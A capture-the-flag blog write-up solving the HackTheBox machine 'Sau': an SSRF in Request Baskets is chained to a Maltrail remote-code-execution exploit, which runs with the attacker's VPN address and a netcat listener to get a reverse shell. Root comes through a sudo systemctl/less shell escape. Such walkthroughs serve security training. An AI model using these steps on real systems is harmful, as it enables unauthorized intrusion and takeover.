Sau
Sau writeup by Thamizhiniyan C S
Overview
Hello everyone, In this blog we are going to solve Sau from HackTheBox.
Link for the machine : https://app.hackthebox.com/machines/Sau
Lets Start 🙌
Connect to the HTB server by using the OpenVpn configuration file that’s generated by HTB.
[ Click Here to learn more about how to connect to vpn and access the boxes. ]
After connecting to the vpn service, click on Join Machine to access the machine’s ip.
After joining the machine you can see the IP Address of the target machine.
Reconnaissance
First I started by scanning for open ports on the target machine.
From the response of the nmap , there are 3 open ports of which one is SSH running on port 22, on port 80 HTTP service is running, but its filtered by firewall and the other one is running on port 55555 , which is unknown, but returns a response for HTTP GET request.
On visiting port 55555 on via browser, It returned a website.
Enumerating the Website
In the website is running the request baskets service version 1.2.1. On searching about this service on google, found this:
which proves that the website is vulnerable to SSRF vulnerability. To exploit this vulnerability first create a new basket.
Next make a note on the basket name and the access token and click on open basket.
After opening the basket click on the settings icon on the top right corner.
It open a configuration dialog box.
On the configuration dialog box, fill the details as shown in the above figure and click apply. By configuring as mentioned above, we are trying to access the HTTP service running on port 80 which was blocked by the firewall on the target machine by leveraging the SSRF vulnerability.
Basically what ever URL we configure on request basket, the request basket will send a GET request on its behalf and fetch the results for us, in our case it acts like a proxy to fetch the website, which is not accessible to use from the outside network, but is accessible to request basket application, since it is running on the same network on which the web service is running.
Now open the link [ mentioned in the above picture, link might be different in your case ] in a new tab.
We can see a website which is running Maltrail v0.53, nothing else is interesting on the website. So I started searching about Maltrail v0.53, and found this
from which we can devise that the service is vulnerable to RCE.
Getting the User Flag
I downloaded the payload to give it a try.
Before executing the payload, I started a netcat listener on port 8000.
Now its time to execute the payload.
Command: python3 51676 <HTB_VPN_TUN_IP> 8000 <the_request_basket_address_that_we_used_to_access_the_web_service>
After executing the exploit, check the netcat listener.
We successfully got the connection back. Now we got our initial access to the target machine. First I upgraded the shell.
Command: python3 -c 'import pty; pty.spawn("/bin/bash")'
And also I found the user flag.
Getting the Root Flag
Now its time to escalate our privileges and find the root flag.
I was looking out for some common privilege escalation vectors and found this.
The user puma can run the command /usr/bin/systemctl status trail.service as sudo without entering the password. I checked GTFObins regarding this and found this
Thus if we run the command sudo /usr/bin/systemctl status trail.service , then run the command !sh after entering into the less page, we can escalate our privileges as root.
Now we have successfully escalated our privileges as root. Now its time to find the root flag.
We have successfully found the root flag.
Thank You…….
Last updated
